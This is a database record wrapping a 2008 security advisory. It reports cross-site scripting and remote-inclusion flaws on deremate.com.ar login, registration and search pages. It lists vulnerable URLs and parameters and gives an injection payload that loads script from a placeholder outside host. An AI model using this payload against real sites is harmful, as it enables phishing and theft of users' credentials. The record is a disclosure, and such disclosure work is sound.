{"id": "PACKETSTORM:69354", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "deremate-xssrfi.txt", "description": "", "published": "2008-08-24T00:00:00", "modified": "2008-08-24T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/69354/deremate-xssrfi.txt.html", "reporter": "Ivan Sanchez", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:29:36", "viewCount": 18, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "7bc6131368816bba515e389b1b346bbf"}, "sourceHref": "https://packetstormsecurity.com/files/download/69354/deremate-xssrfi.txt", "sourceData": "`[ www.nullcode.com.ar ] \n \n+==========================================================================+ \n+ Deremate.com security compromised with XSS/ RFI flaw + \n+==========================================================================+ \n \n \nAuthor(s): Ivan Sanchez \n \nProduct:deremate.com \n \nWeb:http://www.deremate.com/ \n \nVersions,sites affected: Copyright \u00a9 1999-2006 DeRemate.com \n \n \nDate: 24/08/2008 \n \n \nOn Deremate Domain Sites Allows Phishing and others security compromised with XSS/ RFI/ flaw... 
\n \n \n \nGOOGLE DORKS: \n------------ \n \n\"deremate.com\" \n \n \n \nDomains affected part I: \n------------------------ \n \nhttp://afiliados.deremate.com.ar/login.asp \nhttp://afiliados.deremate.com.ar/registro/registro-particular-t1.asp \nhttp://afiliados.deremate.com.ar/registro/registro-empresa-t1.asp \n \n(there are other vulnerable links) \n \n \nParameters affected: \n-------------------- \n \ntxtIDUsuario \ntxtContrasena \n \n \nEvil code to input into parameter: \"><script src=http://site/scripts/evil.js></script> \n \n \n \nDomain affected part II: \n------------------------- \n \nhttp://www.deremate.com.ar/cafe/runSearch.asp \n \n(there are other vulnerable links) \n \n \nParameters affected: \n-------------------- \n \ntoSearch \n \nEvil code to input into parameter: \"><script src=http://site/scripts/evil.js></script> \n \n \n \nRemediation: review and then sanitize all internal code. \n------------ \n \n \n \nNULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! \n+==========================================================================+ \n+ Deremate security compromised with XSS/ RFI flaw + \n+==========================================================================+ \n`\n"}
{}